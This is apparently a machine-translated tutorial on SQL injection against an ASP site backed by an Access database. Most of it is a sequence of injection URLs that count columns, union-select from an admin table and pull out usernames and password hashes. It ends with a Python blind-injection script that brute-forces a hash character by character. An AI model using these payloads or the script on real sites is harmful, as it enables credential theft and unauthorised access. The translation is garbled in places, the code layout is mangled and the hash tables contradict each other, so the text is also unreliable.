Web security ACCESS Injection, blind footnote book

Http://www.xxx.cn/cp.asp?classid=3
Http://www.xxx.cn/cp.asp?classid=3 and//blocking keyword
Http://www.xxx.cn/cp.asp?classid=3 and 1=1//capitalization bypass
Http://www.xxx.cn/cp.asp?classid=3 and 1=2
Http://www.xxx.cn/cp.asp?classid=3 ORDER by 8%16//Normal
Http://www.xxx.cn/cp.asp?classid=3 ORDER by 9%16//Error
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,2,3,4,5,6,7,8 from ADMIN%16//return to normal, burst can display bit 2, indicating the presence of the ADMIN table
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,id,3,4,5,6,7,8 from admin%16//return 4,5,7 descriptions have three users, respectively, with an ID of 4,5,7

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 1 1,admin,3,4,5,6,7,8 from admin%16//lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 2 1,admin,3,4,5,6,7,8 from admin%16//admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT TOP 3 1,admin,3,4,5,6,7,8 from admin%16//admin8
Or
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=4%16//lxiaofu
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=5%16//admin
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin WHERE id=7%16//admin8
Again or
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,admin,3,4,5,6,7,8 from admin%16//Burst Admin,admin8,lxiaofu

http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,pwd,3,4,5,6,7,8 from admin%16//Burst 4817cc8dcbb3fb5,ae0284ccc20bdde, bbd06203b2ba922

To organize the current results:
ID admin pwd
4 Lxiaofu bbd06203b2ba922
5 Admin Ae0284ccc20bdde
7 Admin8 4817CC8DCBB3FB5

But the above MD5 ciphertext are 15 bits, the normal should be 16 bit or 32 bit:

First look at the length of the PWD field:
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,len (pwd), 3,4,5,6,7,8 from ADMIN%16//return 16, indicating ciphertext is 16 bits

Known ciphertext is 16 bits, then to intercept the 16th bit, the condition is ID
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=4%16//f
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=5%16//8
http://www.xxx.cn/cp.asp?classid=3 UNION SELECT 1,mid (pwd,16,1), 3,4,5,6,7,8 from ADMIN WHERE id=7%16//c
Or
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=4), 3,4,5,6,7,8 from admin%16 F
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=5), 3,4,5,6,7,8 from admin%16 8
http://www.xxx.cn/cp.asp?classid=3 UNION Select 1, (select MID (pwd,16,1) from admin WHERE id=7), 3,4,5,6,7,8 from admin%16 C

To organize the current results:
ID admin pwd
4 Lxiaofu bbd06203b2ba922f
5 Admin 4817cc8dcbb3fb58
7 Admin8 Ae0284ccc20bddec

Or use the test blind footnote book:

Import requestsheads = {' user-agent ': ' mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) gecko/20100101 firefox/52.0 '}payloads= ' [email protected]_. ' Pwd=[]for i in range (1,17): For    payload in payloads:        URL = "http://www.xxx.cn/cp.asp?classid=24 and ASC ((SELECT T OP 1 MID (pwd,{},1) from admin) ={} ". Format (I,ord (payload))        response= (Requests.get (url=url,headers=heads). Content). Decode (encoding= ' GBK ')        # print (URL)        if str ("? product_id=194 ") in response:            pwd.append (payload)            print (' \ n ', ' pwd is: ', payload,end= ')            break        Else : Print ('            . ', end= ') print (' \ n [done] pwd: ', '. Join ([i-I in PWD])

　　

Web security ACCESS Injection, blind footnote book